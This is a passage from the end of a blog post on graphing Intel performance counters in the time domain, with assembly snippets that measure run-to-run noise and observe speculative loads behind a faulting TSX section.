; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0
00000041  B98F030000        mov ecx,0x38f
00000046  31C0              xor eax,eax
00000048  31D2              xor edx,edx
0000004A  0F30              wrmsr

Here we’re just going to write to NULL 4 times. This might sound bad, but in this example I mapped NULL in as normal write-back memory. Nothing crazy, just treat it as a valid address.

But here are the results:

Noise Sample

Hmmm… we have error bars! We see the stores always get dispatched at the same time. This makes sense, we’re always doing the same thing. But we see that some of the instructions have some variance in where they retire. For example, at cycle=38 we see that sometimes at this point 2 instructions have been retired, other times 4 have been retired, but on average a little over 3 instructions have been retired at this point. This tells us that the CPU isn’t always deterministic in this environment.

These results can get a bit more complex to interpret, but it’s still relevant data nevertheless. Changing the code under test, cleaning up to the environment to be more determinsitic, etc, can often improve the quality and visibility of the data.

Does it work with speculation?

Damn right it does! That was the whole point!

Let’s cause a fault, perform some loads behind it, and see if we can see the loads get issued even though the entire section of code is discarded.

    // Start a TSX section, think of this as a `try {` block
    xbegin 2f

    // Read from -1, causing a fault
    mov rax, [-1]

    // Here's some loads shadowing the faulting load. These
    // should never occur, as the instruction above causes
    // an exeception and thus execution should "jump" to the label `2:`

    .rept 32
        // Repeated load 32 times
        mov rbx, [0]
    .endr

    // End the TSX section, think of this as a `}` closing the
    // `try` block
    xend

2:
    // Here is where execution goes if the TSX section had
    // an exception, and thus where execution will flow

Speculation Sample

Both ports 2 and port 3 are load ports. We see both of them taking turns handling loads (1 load per cycle each, with 2 ports, 2 loads per cycle total). Here we can see many different loads get dispatched, even though very few instructions actually retire. What we’re viewing here is the micro-architecture performing speculation! Neat!

More data?

I could go on and on graphing different CPU behaviors! There’s so much cool stuff to explore out there. However, this blog has already gotten longer than I wanted, so I’ll stop here. Maybe I’ll make future small blogs about certain interesting behaviors!


Conclusion

This technique of measuring performance counters on a time-domain seems to work quite well. You have to be very careful with noise, but with careful interpretation of the data, this technique provides the highest level of visibility into the Intel micro-architecture that I’ve ever seen!

This tool is incredibly useful for validating hypothesises about behaviors of various Intel micro-architectures. By running multiple experiments on different behaviors, a more macro-level model can be derived about the inner workings of the CPU. This could lead to learning new optimization techniques, finding new CPU vulnerabilities, and just in general having fun learning how things work!


Source?

Update: 8/19/2019

This kernel has too many sensitive features that I do not want to make public at this time…

However, it seems there’s a lot of interest in this tech, so I will try to live stream soon adding this functionality to my already-open-source kernel Orange Slice!


❌
❌